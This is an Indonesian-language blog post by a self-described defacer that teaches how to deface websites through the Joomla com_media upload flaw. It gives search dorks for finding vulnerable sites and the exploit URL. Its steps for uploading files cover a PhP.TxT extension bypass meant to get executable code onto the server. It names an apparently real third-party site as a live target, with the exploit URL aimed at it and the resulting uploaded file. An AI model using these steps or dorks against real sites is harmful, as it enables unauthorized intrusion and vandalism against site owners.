Hi apa kalian sudah tau apa itu deface?
jika kalian belum tau deface adalah adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi. Hal ini bertujuan untuk melakukan perubahan tampilan pada website korban dengan tampilan yang dimiliki oleh si defacer
Dan kali ini Saya akan Memberi tahu bagaimana deface menggunakan methode com_media adalah Teknik Exploit Joomla yang memiliki Vulnerabilitas pada Component Media di CMS Joomla.
Dan langsung kita mulai saja
Dork:1.: inurl:index.php?option=com_media site:com
2: inurl:index2.php?option=com_media site:net 3: inurl:option=com_media
Exploit:/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
1.kalian mulai men-dorking (live target:http://www.customdesignblinds.com/)
2. masukan Exploit tadi (http://www.customdesignblinds.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=)
3.setelah itu kalian Upload file kalian (biasanya com_media hanya bisa mengupload file ext txt atau jpg)
4.setelah itu kalian klik start upload
5.dan kalian dapat membuka file kalian di site.com/images/namafilekamu.txt
hasilnya akan seperti ini http://www.customdesignblinds.com/images/f0x.txt
kalian juga bisa bypass ext dengan ext PhP.TxT tapi tidak semua website bisa dengan bypass itu
Semoga dengan artikel ini membantu kalian ;)
F0x35 ~ Error Violence
0 comments:
Post a Comment